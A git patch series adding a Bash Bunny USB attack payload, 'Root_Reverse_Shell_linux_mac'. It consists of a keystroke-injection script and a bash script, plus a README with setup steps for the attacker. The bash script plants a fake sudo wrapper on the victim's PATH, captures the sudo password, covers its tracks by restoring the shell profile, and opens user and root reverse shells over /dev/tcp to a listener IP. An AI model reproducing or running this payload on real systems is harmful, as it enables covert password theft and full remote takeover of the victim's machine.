From 7103031e6e775b10745c6a3ad5bb5f1e0e6cf2de Mon Sep 17 00:00:00 2001 From: root Date: Fri, 8 May 2020 08:11:07 +0530 Subject: [PATCH 1/9] Updated changes suggested by darren --- .../Root_Reverse_Shell_linux_mac/README.md | 17 ++++++ .../Root_Reverse_Shell_linux_mac/payload.sh | 55 +++++++++++++++++++ .../Root_Reverse_Shell_linux_mac/payload.txt | 49 +++++++++++++++++ 3 files changed, 121 insertions(+) create mode 100644 payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md create mode 100644 payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh create mode 100644 payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md new file mode 100644 index 00000000..253ca4d4 --- /dev/null +++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md @@ -0,0 +1,17 @@ +# Root_Reverse_Shell_linux_mac + +### Since i dont have a bash bunny this is tested in digispark +### I have converted this script to bash bunny +### If any issues put in discussion i will fix it +POC DIGISPARK LINK : https://drive.google.com/open?id=1DvKX8QXHImVRZMaoTvmtreFkiL4rwYF- +### Special thanks to sudobackdoor for bash script sample +Dont forgot to change IP in payload.sh +Before using this payload don't forgot to start netcat listeners on port 4444 and 1337 +Because it gives both user shell and root shell + +When bash bunny executes payload in a machine wich is neither linux nor mac, it will download the payload.sh from server +then executes it and removes the payload.sh. + +Once the payload.sh is executed as explained in the sudobackdoor script it will gets the root credential instead of storing it it will used for getting higher privileges and gives a reverse root netcat connection. Additionaly i have added a user level netcat connection also. + +The reason for two netcat connection is user level connection established when script is executed. But to obtain root credenitals it requires time because the user need elevate his privileges to root. So initialy i have given a normal connection then after sudo execution root connection will be established. diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh new file mode 100644 index 00000000..8ce02260 --- /dev/null +++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh @@ -0,0 +1,55 @@ +#!/bin/bash + +if [ ! -d ~/.config/sudo ] +then + mkdir -p ~/.config/sudo +fi + +if [ -f ~/.config/sudo/sudo ] +then + rm ~/.config/sudo/sudo +fi + + +echo '#!'$SHELL >> ~/.config/sudo/sudo +cat <<'EOF' >> ~/.config/sudo/sudo +/usr/bin/sudo -n true 2>/dev/null +if [ $? -eq 0 ] +then + /usr/bin/sudo $@ +else + echo -n "[sudo] password for $USER: " + read -s pwd + echo + echo "$pwd" | /usr/bin/sudo -S true 2>/dev/null + if [ $? -eq 1 ] + then + echo "Sorry, try again." + sudo $@ + else + /usr/bin/sudo -S $@ + if [ -f ~/.bash_profile ] + then + rm ~/.bash_profile + mv ~/.darkbash ~/.bash_profile + else + rm ~/.bashrc + mv ~/.darkbashrc ~/.bashrc + fi + rm ~/.config/sudo/sudo + echo "$pwd" | sudo -S disown !$ $(sudo /bin/bash -i > /dev/tcp/192.168.0.118/1337 0<&1 2>&1) & + fi +fi +EOF + +chmod u+x ~/.config/sudo/sudo +if [ -f ~/.bash_profile ] +then + cp ~/.bash_profile ~/.darkbash + echo "export PATH=~/.config/sudo:$PATH" >> ~/.bash_profile +else + cp ~/.bashrc ~/.darkbashrc + echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc +fi +disown !$ $(/bin/bash -i > /dev/tcp/192.168.0.118/4444 0<&1 2>&1) & +bash diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt new file mode 100644 index 00000000..9a06e38d --- /dev/null +++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt @@ -0,0 +1,49 @@ +# Title: Linux/Mac Reverse Shell +# Author: Darkprince(Sridhar) +# Version: 1.0 +# +# Runs a script in the background that gives a user shell initially and waits for user to +# escalate privileges and give a root reverse shell +# +# Magenta..................Setup +# Red,Green,Blue......Executing +# Green....................Finished + + +# INITIALIZING +LED W + +# Mac keyboard works in linux and mac +ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E + +LANGUAGE='us' + +# Make sure the switch position is 1 + +# ATTACKING +LED R G B + +# Get linux,mac Termial +RUN UNITY xterm +Q DELAY 1000 +# To close opened window by linux run command +Q GUI Q +Q CTRL C +RUN OSX terminal +Q DELAY 1000 + +# If linux then clearing 'terminal' which is typed by mac run script +Q CTRL C + +# Executing bash script which is same for mac and linux +Q STRING bash /Volumes/BashBunny/payloads/switch1/payload.sh + +# The cleanup process will done by bash script +# Closing the xterm in linux +# Closing the terminal in mac even if terminal has other process COMMAND Q and ENTER key will terminates terminal +Q GUI Q +Q CTRL C +Q STRING exit +Q ENTER + +LED G From 8c13b961a3dfd9e2eb5a4524e0aa0329d56c0dc9 Mon Sep 17 00:00:00 2001 From: Darkprince <30362337+sridharas04@users.noreply.github.com> Date: Sat, 16 May 2020 14:08:56 +0530 Subject: [PATCH 2/9] Updated Description --- .../remote_access/Root_Reverse_Shell_linux_mac/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md index 253ca4d4..143f5388 100644 --- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md +++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md @@ -8,9 +8,9 @@ POC DIGISPARK LINK : https://drive.google.com/open?id=1DvKX8QXHImVRZMaoTvmtreFki Dont forgot to change IP in payload.sh Before using this payload don't forgot to start netcat listeners on port 4444 and 1337 Because it gives both user shell and root shell +Make sure switch is in 1st position. -When bash bunny executes payload in a machine wich is neither linux nor mac, it will download the payload.sh from server -then executes it and removes the payload.sh. +When bash bunny executes payload in a machine wich is neither linux nor mac, it will executes payload.sh. Once the payload.sh is executed as explained in the sudobackdoor script it will gets the root credential instead of storing it it will used for getting higher privileges and gives a reverse root netcat connection. Additionaly i have added a user level netcat connection also. From 04d19c4c94c972b621526ca33b8b0d2eb1f18c4a Mon Sep 17 00:00:00 2001 From: Darkprince <30362337+sridharas04@users.noreply.github.com> Date: Sat, 16 May 2020 14:12:42 +0530 Subject: [PATCH 3/9] Minor changes in description. --- .../remote_access/Root_Reverse_Shell_linux_mac/README.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md index 143f5388..b2412da3 100644 --- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md +++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md @@ -5,10 +5,10 @@ ### If any issues put in discussion i will fix it POC DIGISPARK LINK : https://drive.google.com/open?id=1DvKX8QXHImVRZMaoTvmtreFkiL4rwYF- ### Special thanks to sudobackdoor for bash script sample -Dont forgot to change IP in payload.sh -Before using this payload don't forgot to start netcat listeners on port 4444 and 1337 -Because it gives both user shell and root shell -Make sure switch is in 1st position. +Dont forgot to change IP in payload.sh.
+Before using this payload don't forgot to start netcat listeners on port 4444 and 1337.
+It reverse connects user shell in port 4444 and root shell in port 1337.
+Make sure switch is in position 1.
When bash bunny executes payload in a machine wich is neither linux nor mac, it will executes payload.sh. From d8ba87b488289c09db35dca9f389bad68c49a10e Mon Sep 17 00:00:00 2001 From: Darkprince <30362337+sridharas04@users.noreply.github.com> Date: Sat, 16 May 2020 19:55:43 +0530 Subject: [PATCH 4/9] Corrections in README --- .../Root_Reverse_Shell_linux_mac/README.md | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md index b2412da3..6e6c9d56 100644 --- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md +++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md @@ -5,13 +5,11 @@ ### If any issues put in discussion i will fix it POC DIGISPARK LINK : https://drive.google.com/open?id=1DvKX8QXHImVRZMaoTvmtreFkiL4rwYF- ### Special thanks to sudobackdoor for bash script sample -Dont forgot to change IP in payload.sh.
-Before using this payload don't forgot to start netcat listeners on port 4444 and 1337.
+Dont forget to change IP in payload.sh.
+Before using this payload don't forget to start netcat listeners on port 4444 and 1337.
It reverse connects user shell in port 4444 and root shell in port 1337.
Make sure switch is in position 1.
-When bash bunny executes payload in a machine wich is neither linux nor mac, it will executes payload.sh. +Once the payload.sh is executed the sudobackdoor script it will gets the root credential and It will be used for getting higher privileges and gives a reverse root netcat connection. Additionaly i have added a user level netcat connection also. -Once the payload.sh is executed as explained in the sudobackdoor script it will gets the root credential instead of storing it it will used for getting higher privileges and gives a reverse root netcat connection. Additionaly i have added a user level netcat connection also. - -The reason for two netcat connection is user level connection established when script is executed. But to obtain root credenitals it requires time because the user need elevate his privileges to root. So initialy i have given a normal connection then after sudo execution root connection will be established. +The reason for two netcat connection is user level connection established when script is executed. But to obtain root credential is required, So it waits for user to elevate his privileges to root. So initialy i have given a normal connection then after sudo execution root connection will be established. From faa24a329df2d36d23787a9d8bfa9e0092c04a0f Mon Sep 17 00:00:00 2001 From: Darkprince <30362337+sridharas04@users.noreply.github.com> Date: Sat, 16 May 2020 20:02:21 +0530 Subject: [PATCH 5/9] Minor payload changes. --- .../remote_access/Root_Reverse_Shell_linux_mac/payload.sh | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh index 8ce02260..60895f5a 100644 --- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh +++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh @@ -31,10 +31,10 @@ else if [ -f ~/.bash_profile ] then rm ~/.bash_profile - mv ~/.darkbash ~/.bash_profile + mv ~/.bash_profile.bak ~/.bash_profile else rm ~/.bashrc - mv ~/.darkbashrc ~/.bashrc + mv ~/.bashrc.bak ~/.bashrc fi rm ~/.config/sudo/sudo echo "$pwd" | sudo -S disown !$ $(sudo /bin/bash -i > /dev/tcp/192.168.0.118/1337 0<&1 2>&1) & @@ -45,10 +45,10 @@ EOF chmod u+x ~/.config/sudo/sudo if [ -f ~/.bash_profile ] then - cp ~/.bash_profile ~/.darkbash + cp ~/.bash_profile ~/.bash_profile.bak echo "export PATH=~/.config/sudo:$PATH" >> ~/.bash_profile else - cp ~/.bashrc ~/.darkbashrc + cp ~/.bashrc ~/.bashrc.bak echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc fi disown !$ $(/bin/bash -i > /dev/tcp/192.168.0.118/4444 0<&1 2>&1) & From 32e41527fb92f019745087ecbebe88b21793f2b1 Mon Sep 17 00:00:00 2001 From: Sridhar Date: Mon, 1 Jul 2024 10:30:09 +0530 Subject: [PATCH 6/9] Minor update --- .../remote_access/Root_Reverse_Shell_linux_mac/payload.sh | 8 ++++++-- .../Root_Reverse_Shell_linux_mac/payload.txt | 3 ++- 2 files changed, 8 insertions(+), 3 deletions(-) diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh index 60895f5a..314a0bf9 100644 --- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh +++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh @@ -1,5 +1,9 @@ #!/bin/bash +LISTENER_IP="127.0.0.1" +LISTENER1_PORT="1337" #Listener for user shell +LISTENER2_PORT="9001" #Listener for root shell + if [ ! -d ~/.config/sudo ] then mkdir -p ~/.config/sudo @@ -37,7 +41,7 @@ else mv ~/.bashrc.bak ~/.bashrc fi rm ~/.config/sudo/sudo - echo "$pwd" | sudo -S disown !$ $(sudo /bin/bash -i > /dev/tcp/192.168.0.118/1337 0<&1 2>&1) & + echo "$pwd" | sudo -S disown !$ $(sudo /bin/bash -i > /dev/tcp/$LISTENER_IP/$LISTENER1_PORT 0<&1 2>&1) & fi fi EOF @@ -51,5 +55,5 @@ else cp ~/.bashrc ~/.bashrc.bak echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc fi -disown !$ $(/bin/bash -i > /dev/tcp/192.168.0.118/4444 0<&1 2>&1) & +disown !$ $(/bin/bash -i > /dev/tcp/$LISTENER_IP/$LISTENER2_PORT 0<&1 2>&1) & bash diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt index 9a06e38d..76a949dd 100644 --- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt +++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt @@ -36,7 +36,8 @@ Q DELAY 1000 Q CTRL C # Executing bash script which is same for mac and linux -Q STRING bash /Volumes/BashBunny/payloads/switch1/payload.sh +GET SWITCH_POSITION +Q STRING bash /Volumes/BashBunny/payloads/$SWITCH_POSITION/payload.sh # The cleanup process will done by bash script # Closing the xterm in linux From 00713d6b7f7c5711b7f7e8f7049783d72c97662e Mon Sep 17 00:00:00 2001 From: Sridhar Date: Mon, 1 Jul 2024 10:33:00 +0530 Subject: [PATCH 7/9] Minor update --- .../remote_access/Root_Reverse_Shell_linux_mac/payload.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh index 314a0bf9..7b7cd436 100644 --- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh +++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh @@ -2,7 +2,7 @@ LISTENER_IP="127.0.0.1" LISTENER1_PORT="1337" #Listener for user shell -LISTENER2_PORT="9001" #Listener for root shell +LISTENER2_PORT="4444" #Listener for root shell if [ ! -d ~/.config/sudo ] then From 94c3342302c3dc8b9ffa5d0f6e2c51f08fb75d78 Mon Sep 17 00:00:00 2001 From: Darkprince <30362337+sridharas04@users.noreply.github.com> Date: Mon, 1 Jul 2024 10:36:07 +0530 Subject: [PATCH 8/9] Update payload.sh --- .../remote_access/Root_Reverse_Shell_linux_mac/payload.sh | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh index 7b7cd436..8bb8fe8b 100644 --- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh +++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh @@ -1,8 +1,8 @@ #!/bin/bash LISTENER_IP="127.0.0.1" -LISTENER1_PORT="1337" #Listener for user shell -LISTENER2_PORT="4444" #Listener for root shell +LISTENER1_PORT="1337" #Listener for root shell +LISTENER2_PORT="4444" #Listener for user shell if [ ! -d ~/.config/sudo ] then From 19b4ff63f0838a20685ed3eb647c5522a0f11c02 Mon Sep 17 00:00:00 2001 From: Darkprince <30362337+sridharas04@users.noreply.github.com> Date: Tue, 23 Jul 2024 17:56:14 +0530 Subject: [PATCH 9/9] Added delay for device recognition --- .../Root_Reverse_Shell_linux_mac/payload.txt | 32 +++++++++---------- 1 file changed, 16 insertions(+), 16 deletions(-) diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt index 76a949dd..bbe4d459 100644 --- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt +++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt @@ -1,47 +1,47 @@ # Title: Linux/Mac Reverse Shell -# Author: Darkprince(Sridhar) +# Author: Darkprince (Sridhar) # Version: 1.0 # -# Runs a script in the background that gives a user shell initially and waits for user to -# escalate privileges and give a root reverse shell -# -# Magenta..................Setup -# Red,Green,Blue......Executing -# Green....................Finished +# Runs a script in the background that provides a user shell initially and waits for the user to escalate privileges, then provides a root reverse shell. +# Magenta..................Setup +# Red, Green, Blue.........Executing +# Green....................Finished # INITIALIZING LED W -# Mac keyboard works in linux and mac +# Mac keyboard works in Linux and Mac ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E LANGUAGE='us' -# Make sure the switch position is 1 +# Ensure the switch position is 1 +# Delay for HID device recognition +Q DELAY 1000 # ATTACKING LED R G B -# Get linux,mac Termial +# Get Linux/Mac Terminal RUN UNITY xterm Q DELAY 1000 -# To close opened window by linux run command +# To close the opened window by the Linux run command Q GUI Q Q CTRL C RUN OSX terminal Q DELAY 1000 -# If linux then clearing 'terminal' which is typed by mac run script +# If Linux, then clearing 'terminal' which is typed by Mac run script Q CTRL C -# Executing bash script which is same for mac and linux +# Execute bash script which is the same for Mac and Linux GET SWITCH_POSITION Q STRING bash /Volumes/BashBunny/payloads/$SWITCH_POSITION/payload.sh -# The cleanup process will done by bash script -# Closing the xterm in linux -# Closing the terminal in mac even if terminal has other process COMMAND Q and ENTER key will terminates terminal +# The cleanup process will be handled by the bash script +# Closing the xterm in Linux +# Closing the terminal in Mac, even if the terminal has other processes COMMAND Q and ENTER keys will terminate the terminal Q GUI Q Q CTRL C Q STRING exit